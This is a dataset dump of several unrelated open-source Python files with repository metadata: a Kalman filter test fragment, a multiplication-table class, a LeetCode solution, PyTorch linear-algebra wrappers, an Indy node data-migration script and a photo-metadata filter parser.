timespan=(0.0, 1e-3),
step=1e-5,
forward_implementation="sqrt",
backward_implementation="sqrt",
)
kalman = filtsmooth.gaussian.Kalman(info["prior_process"])
# This should raise a ValueError
regression_problem.locations[1] = regression_problem.locations[0]
with pytest.raises(ValueError):
posterior, _ = kalman.filtsmooth(regression_problem)
| 31.57377
| 88
| 0.702752
|
370aea85fb542ce132dbb342b5e39fb826855ca6
| 1,341
|
py
|
Python
|
PrimeUs/Multiply.py
|
wyllie/PrimeUs
|
e076669d7cb1d29179606723204a7bd746778495
|
[
"MIT"
] | null | null | null |
PrimeUs/Multiply.py
|
wyllie/PrimeUs
|
e076669d7cb1d29179606723204a7bd746778495
|
[
"MIT"
] | 2
|
2019-10-15T22:28:13.000Z
|
2019-10-16T13:25:36.000Z
|
PrimeUs/Multiply.py
|
wyllie/PrimeUs
|
e076669d7cb1d29179606723204a7bd746778495
|
[
"MIT"
] | 1
|
2019-10-16T21:22:36.000Z
|
2019-10-16T21:22:36.000Z
|
class Multiply():
def __init__(self):
pass
def two_lists(self, rows, columns):
'create a multiplication table from two lists of integers'
table = []
row1 = ['X']
row1.extend(columns)
table.append(row1)
for row in sorted(rows):
row_list = [row]
for column in sorted(columns):
row_list.append(row * column)
table.append(row_list)
return table
def two_lists_dict(self, rows, columns):
'create a multiplication table from two lists of integers'
table = dict()
for row in sorted(rows):
row_dict = dict()
for column in sorted(columns):
row_dict[column] = row * column
table[row] = row_dict
return table
def format_table(self, table):
'return a nicely(ish) formatted table'
# get the width of each column
widths = []
for col in zip(*table):
widths.append(max(map(len, map(str, col))))
# create the formatted rows
output_rows = []
for row in table:
output_rows.append(' '.join(str(val).rjust(width)
for val, width in zip(row, widths)))
output = '\n'.join(output_rows)
return output
| 25.301887
| 76
| 0.536167
|
5878589c43ef41e93f2acb3b87f08e9ec3bc204a
| 1,164
|
py
|
Python
|
python/520.py
|
HymEric/LeetCode
|
e32439a76968d67f99881b6d07fb16e21c979c9e
|
[
"Apache-2.0"
] | 2
|
2019-09-27T11:41:02.000Z
|
2019-10-17T21:50:23.000Z
|
python/520.py
|
HymEric/LeetCode
|
e32439a76968d67f99881b6d07fb16e21c979c9e
|
[
"Apache-2.0"
] | null | null | null |
python/520.py
|
HymEric/LeetCode
|
e32439a76968d67f99881b6d07fb16e21c979c9e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# @Time : 2019/10/15 0015 16:21
# @Author : Erichym
# @Email : 951523291@qq.com
# @File : 520.py
# @Software: PyCharm
class Solution:
def detectCapitalUse(self, word: str) -> bool:
if 97<=ord(word[0])<=122:
for i in range(1,len(word),1):
if ord(word[i])>122 or ord(word[i])<97:
return False
return True
# first alpha is capital
elif len(word)>1:
if 65 <= ord(word[1]) <= 90:
for i in range(2, len(word), 1):
if ord(word[i]) > 90 or ord(word[i]) < 65:
return False
return True
if 97 <= ord(word[1]) <= 122:
for i in range(1, len(word), 1):
if ord(word[i]) > 122 or ord(word[i]) < 97:
return False
return True
else:
return True
def detectCapitalUse2(self, word: str) -> bool:
return word.isupper() or word.islower() or word.istitle()
if __name__=="__main__":
word="G"
so=Solution()
a=so.detectCapitalUse2(word)
print(a)
| 32.333333
| 65
| 0.4811
|
2e8ff20a48ded4afd71689424ce90011177e1927
| 2,275
|
py
|
Python
|
geomstats/_backend/pytorch/linalg.py
|
tristancabel/geomstats
|
eeba7b7a652d45fc0053e35219c03627f2e8406f
|
[
"MIT"
] | 2
|
2020-01-23T04:01:02.000Z
|
2020-08-18T19:20:27.000Z
|
geomstats/_backend/pytorch/linalg.py
|
tristancabel/geomstats
|
eeba7b7a652d45fc0053e35219c03627f2e8406f
|
[
"MIT"
] | null | null | null |
geomstats/_backend/pytorch/linalg.py
|
tristancabel/geomstats
|
eeba7b7a652d45fc0053e35219c03627f2e8406f
|
[
"MIT"
] | 1
|
2021-03-14T06:54:09.000Z
|
2021-03-14T06:54:09.000Z
|
"""Pytorch based linear algebra backend."""
import numpy as np
import scipy.linalg
import torch
def _raise_not_implemented_error(*args, **kwargs):
raise NotImplementedError
eig = _raise_not_implemented_error
expm = torch.matrix_exp
logm = _raise_not_implemented_error
inv = torch.inverse
det = torch.det
def cholesky(a):
return torch.cholesky(a, upper=False)
def sqrtm(x):
np_sqrtm = np.vectorize(
scipy.linalg.sqrtm, signature='(n,m)->(n,m)')(x)
return torch.as_tensor(np_sqrtm, dtype=x.dtype)
def eigvalsh(a, **kwargs):
upper = False
if 'UPLO' in kwargs:
upper = (kwargs['UPLO'] == 'U')
return torch.symeig(a, eigenvectors=False, upper=upper)[0]
def eigh(*args, **kwargs):
eigvals, eigvecs = torch.symeig(*args, eigenvectors=True, **kwargs)
return eigvals, eigvecs
def svd(x, full_matrices=True, compute_uv=True):
is_vectorized = x.ndim == 3
axis = (0, 2, 1) if is_vectorized else (1, 0)
if compute_uv:
u, s, v_t = torch.svd(
x, some=not full_matrices, compute_uv=compute_uv)
return u, s, v_t.permute(axis)
return torch.svd(x, some=not full_matrices, compute_uv=compute_uv)[1]
def norm(x, ord=None, axis=None):
if axis is None:
return torch.linalg.norm(x, ord=ord)
return torch.linalg.norm(x, ord=ord, dim=axis)
def solve_sylvester(a, b, q):
if a.shape == b.shape:
if torch.all(a == b) and torch.all(
torch.abs(a - a.transpose(-2, -1)) < 1e-6):
eigvals, eigvecs = eigh(a)
if torch.all(eigvals >= 1e-6):
tilde_q = eigvecs.transpose(-2, -1) @ q @ eigvecs
tilde_x = tilde_q / (
eigvals[..., :, None] + eigvals[..., None, :])
return eigvecs @ tilde_x @ eigvecs.transpose(-2, -1)
solution = np.vectorize(
scipy.linalg.solve_sylvester,
signature='(m,m),(n,n),(m,n)->(m,n)')(a, b, q)
return torch.from_numpy(solution)
def qr(*args, **kwargs):
matrix_q, matrix_r = np.vectorize(
np.linalg.qr,
signature='(n,m)->(n,k),(k,m)',
excluded=['mode'])(*args, **kwargs)
tensor_q = torch.from_numpy(matrix_q)
tensor_r = torch.from_numpy(matrix_r)
return tensor_q, tensor_r
| 27.743902
| 73
| 0.615824
|
0e6bacf3a70fc455f4c72f489e7e793ce7ab99fc
| 1,301
|
py
|
Python
|
data/migrations/deb/1_1_150_to_1_1_151.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 627
|
2017-07-06T12:38:08.000Z
|
2022-03-30T13:18:43.000Z
|
data/migrations/deb/1_1_150_to_1_1_151.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 580
|
2017-06-29T17:59:57.000Z
|
2022-03-29T21:37:52.000Z
|
data/migrations/deb/1_1_150_to_1_1_151.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 704
|
2017-06-29T17:45:34.000Z
|
2022-03-30T07:08:58.000Z
|
import os
import shutil
import subprocess
from indy_common.util import compose_cmd
def rename_if_exists(dir, old_name, new_name):
if os.path.exists(os.path.join(dir, old_name)):
os.rename(os.path.join(dir, old_name),
os.path.join(dir, new_name))
def rename_request_files(requests_dir):
for relative_name in os.listdir(requests_dir):
absolute_name = os.path.join(requests_dir, relative_name)
if os.path.isfile(absolute_name) and absolute_name.endswith('.sovrin'):
os.rename(absolute_name, absolute_name[:-len('.sovrin')] + '.indy')
def migrate():
source_dir = os.path.expanduser('/home/sovrin/.sovrin')
target_dir = os.path.expanduser('/home/indy/.indy')
if os.path.isdir(target_dir):
shutil.rmtree(target_dir)
shutil.copytree(source_dir, target_dir)
rename_if_exists(target_dir, '.sovrin', '.indy')
rename_if_exists(target_dir, 'sovrin.env', 'indy.env')
rename_if_exists(target_dir, 'sovrin_config.py', 'indy_config.py')
if os.path.isdir(os.path.join(target_dir, 'sample')):
rename_request_files(os.path.join(target_dir, 'sample'))
subprocess.run(compose_cmd(['chown', '-R', 'indy:indy', target_dir]),
shell=True,
check=True)
migrate()
| 30.97619
| 79
| 0.676403
|
e2f7115d5945da0fd5f4c42038a68ad9c5a7efc0
| 3,177
|
py
|
Python
|
photomanager/lib/filter.py
|
wrenchzc/photomanagger
|
1111587762b6e71b9ffff06241cdcd537b8c96e9
|
[
"MIT"
] | null | null | null |
photomanager/lib/filter.py
|
wrenchzc/photomanagger
|
1111587762b6e71b9ffff06241cdcd537b8c96e9
|
[
"MIT"
] | 4
|
2019-09-18T14:58:16.000Z
|
2022-01-13T00:43:22.000Z
|
photomanager/lib/filter.py
|
wrenchzc/photomanager
|
1111587762b6e71b9ffff06241cdcd537b8c96e9
|
[
"MIT"
] | null | null | null |
import re
import typing
from sqlalchemy.sql.elements import BinaryExpression
from sqlalchemy import func, or_, and_
from photomanager.lib.errors import FilterError, FilterInvalidError
from photomanager.db.models import ImageMeta
FILTER_FIELD_DATE = "date"
class FilterParser(object):
def __init__(self, condition: str):
self.condition = condition
def parse(self) -> BinaryExpression:
pattern = '(.*?)\.(.*?):(.*)'
matched = re.match(pattern, self.condition)
if not matched:
return self.do_parse_fuzzy_search(self.condition)
field, operator, val = matched.groups()
if field == FILTER_FIELD_DATE:
val = self.standard_date_str(val)
return self.do_parse_time_field(operator, val)
def do_parse_fuzzy_search(self, val):
like_cond = f"%{val}%"
return or_(ImageMeta.filename.like(like_cond),
ImageMeta.folder.like(like_cond),
ImageMeta.city.like(like_cond),
ImageMeta.address.like(like_cond)
)
def do_parse_time_field(self, operator: str, val: str) -> BinaryExpression:
# date is a sqlite function
# must use Model.field == None, not Model.field is None, because the operator "==" override by sqlalchemy
if operator == "eq":
return or_(func.date(ImageMeta.origin_datetime) == val,
and_(func.date(ImageMeta.file_createtime) == val,
ImageMeta.origin_datetime == None))
elif operator == "gt":
return or_(func.date(ImageMeta.origin_datetime) > val,
and_(func.date(ImageMeta.file_createtime) > val,
ImageMeta.origin_datetime == None))
elif operator == "gte":
return or_(func.date(ImageMeta.origin_datetime) >= val,
and_(func.date(ImageMeta.file_createtime) >= val,
ImageMeta.origin_datetime == None))
elif operator == "lt":
return or_(func.date(ImageMeta.origin_datetime) < val,
and_(func.date(ImageMeta.file_createtime) < val,
ImageMeta.origin_datetime == None))
elif operator == "lte":
return or_(func.date(ImageMeta.origin_datetime) <= val,
and_(func.date(ImageMeta.file_createtime) <= val,
ImageMeta.origin_datetime == None))
def standard_date_str(self, val: str):
if len(val) < 8 or len(val) > 10:
raise FilterInvalidError
return_val = val
if len(val) == 8: # such as 20201005
return_val = val[0:4] + "-" + val[4:6] + '-' + val[6:]
return return_val
class FiltersParser(object):
def __init__(self, conditions: typing.List[str]):
self.conditions = conditions
def parse(self):
expr = None
for cond in self.conditions:
cur_expr = FilterParser(cond).parse()
if expr is not None:
expr = and_(expr, cur_expr)
else:
expr = cur_expr
return expr
| 37.376471
| 113
| 0.582625
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.